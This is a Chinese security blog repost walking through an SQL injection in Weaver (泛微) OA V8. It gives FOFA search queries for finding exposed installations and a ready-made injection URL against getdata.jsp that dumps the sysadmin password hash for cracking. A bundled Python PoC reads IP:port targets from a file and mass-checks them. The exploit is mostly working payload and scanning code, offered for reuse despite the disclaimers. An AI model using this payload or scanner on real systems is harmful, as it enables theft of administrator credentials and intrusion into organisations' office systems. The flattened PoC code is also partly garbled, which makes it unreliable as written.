泛微OA V8 SQL注入漏洞复现

admin 2021年4月9日15:30:50评论8 views字数 1581阅读5分16秒阅读模式

一漏洞背景

       泛微OA V8 是一款功能强大的泛微协同办公系统标准版程序,其可为用户提供一个协同、集成的办公环境,并且能使所有的办公人员都在统一且个性化的信息门户中一起工作,摆脱时间和地域的限制,实现协同工作与知识管理。

泛微OA V8 具有SQL注入漏洞,可以通过漏洞获取到管理员的密码

 

二、漏洞复现

祭出fofa大法,fofa语法如下

app="Weaver-OA"app="泛微-协同办公OA"

泛微OA V8 SQL注入漏洞复现

随意来一个

泛微OA V8 SQL注入漏洞复现

Burp造请求参数 完成数据库操作

/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

查询HrmResourceManager表中的password,页面中返回了数据库第一条记录的值(sysadmin用户的password)

泛微OA V8 SQL注入漏洞复现

得到md5拿去解密

泛微OA V8 SQL注入漏洞复现

泛微OA V8 SQL注入漏洞复现

顺便加入以下goby里面去

泛微OA V8 SQL注入漏洞复现

附赠poc 大家可以自己写简单 没写保存。自己动手丰衣足食哈各位 也可以用>>name.txt

import requestsimport sysimport reimport urllib3from requests.packages.urllib3.exceptions import InsecureRequestWarninga=[]def title():    print('�33[34m+------------------------------------------�33[0m')    print('+  �33[31m版本: 泛微OA V8 SQL注入漏洞复现 4-8号       �33[0m')    print('+  �33[31m公众号:深夜笔记本                          �33[0m')    print('+  �33[31m使用格式: python3 poc.py                  �33[0m')    print('�33[34m------------------------------------------   �33[0m')
def POC_1(target_url):    core_url = target_url + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager" #poc    try:        response = requests.request("GET", url=core_url, timeout=2)        if response.status_code == 200:  # 返回200         print("�33[32m[o] 存在利用漏洞  �33[0m",core_url)
    except:        print("�33[31m[x] 不存在利用漏洞�33[0m")        return 1
if __name__ == '__main__':    title()    with open('url.txt', 'r', encoding='utf-8') as f:        g=f.read()    a=re.findall('d{1,3}[.]d{1,3}[.]d{1,3}[.]d{1,3}[:]d+',g)
    for i in a:        if 'http' in i:            target_url = str(i)        else:            target_url = 'http://'+str(i)        POC_1(target_url)

特别声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。

作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考

 

原文始发于微信公众号(深夜笔记本):热议-泛微OA V8 SQL注入漏洞复现 4-8号

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月9日15:30:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微OA V8 SQL注入漏洞复现http://cn-sec.com/archives/759476.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息